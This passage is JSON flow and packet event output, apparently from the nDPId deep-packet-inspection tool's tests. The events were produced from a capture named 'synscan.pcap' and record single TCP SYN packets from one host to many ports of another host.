-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1971,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1960,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAssu0AACkGbIWsEAAIQA2GNIzTB8DdU4MZAAAAAGACCAAozAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":179,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1972,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1961,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsiNYAADQGi5ysEAAIQA2GNIzTALPdU4MZAAAAAGACBAAz2QAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1973,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1962,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpYAACUG+NysEAAIQA2GNIzTH53dU4MZAAAAAGACCAAQ7wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5862,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1974,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1963,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsn1UAACYGgx2sEAAIQA2GNIzTFubdU4MZAAAAAGACDAAVpgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1975,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1964,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsUnoAAC4Gx\/isEAAIQA2GNIzTB\/HdU4MZAAAAAGACDAAkmwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10243,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1976,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1965,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsOmgAADcG1wqsEAAIQA2GNIzTKAPdU4MZAAAAAGACEAAAiQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061358,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061358,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":259,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1977,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1966,"flow_packet_id":1,"flow_last_seen":1278275061358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061358,"pkt":"ACYLMQczACWzv5HuCABFAAAsnegAACYGhIqsEAAIQA2GNIzTAQPdU4MZAAAAAGACDAAriQAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":60020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1978,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1967,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAs+6cAADQGGMusEAAIQA2GNIzT6nTdU4MZAAAAAGACBABKFwAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1021,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1979,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1968,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAscTcAADAGpzusEAAIQA2GNIzTA\/3dU4MZAAAAAGACBAAwjwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061410,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061410,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1980,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1969,"flow_packet_id":1,"flow_last_seen":1278275061410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061410,"pkt":"ACYLMQczACWzv5HuCABFAAAsQq0AACUG4MWsEAAIQA2GNIzTJxzdU4MZAAAAAGACCAAJcAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1981,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1970,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsKY4AADkG5eSsEAAIQA2GNIzTDL3dU4MZAAAAAGACCAAjzwAAAgQFtA=="} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1971,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAseEMAADcGmS+sEAAIQA2GNIzTwAXdU4MZAAAAAGACEABohgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1983,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1972,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAss4gAADIGYuqsEAAIQA2GNIzTAgDdU4MZAAAAAGACDAAqjAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1984,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1973,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs5VEAACYGPSGsEAAIQA2GNIzTBBTdU4MZAAAAAGACDAAoeAAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1985,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1974,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsuG8AADcGWQOsEAAIQA2GNIzTDMTdU4MZAAAAAGACEAAbyAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1986,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1975,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAslPkAACYGjXmsEAAIQA2GNIzTF0rdU4MZAAAAAGACDAAVQgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1987,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1976,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAshy8AACwGlUOsEAAIQA2GNIzTFJXdU4MZAAAAAGACBAAf9wAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1988,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1977,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAs66kAACoGMsmsEAAIQA2GNIzTB\/LdU4MZAAAAAGACDAAkmgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1989,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1978,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAslfEAACwGhoGsEAAIQA2GNIzTF3XdU4MZAAAAAGACBAAdFwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1990,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1979,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsB4gAADsGBeusEAAIQA2GNIzTBFbdU4MZAAAAAGACEAAkNgAAAgQFtA=="} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1991,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1980,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsJ7wAADkG57asEAAIQA2GNIzTCp7dU4MZAAAAAGACCAAl7gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1992,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1981,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsUvkAADoGu3msEAAIQA2GNIzTBFDdU4MZAAAAAGACDAAoPAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1993,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1982,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsZ3YAADUGq\/ysEAAIQA2GNIzTBxTdU4MZAAAAAGACCAApeAAAAgQFtA=="} 
-00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1994,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1983,"flow_packet_id":1,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061415,"pkt":"ACYLMQczACWzv5HuCABFAAAsTd8AAC4GzJOsEAAIQA2GNIzTATLdU4MZAAAAAGACDAArWgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1995,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1984,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061415,"flow_last_seen":1278275061415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061415,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
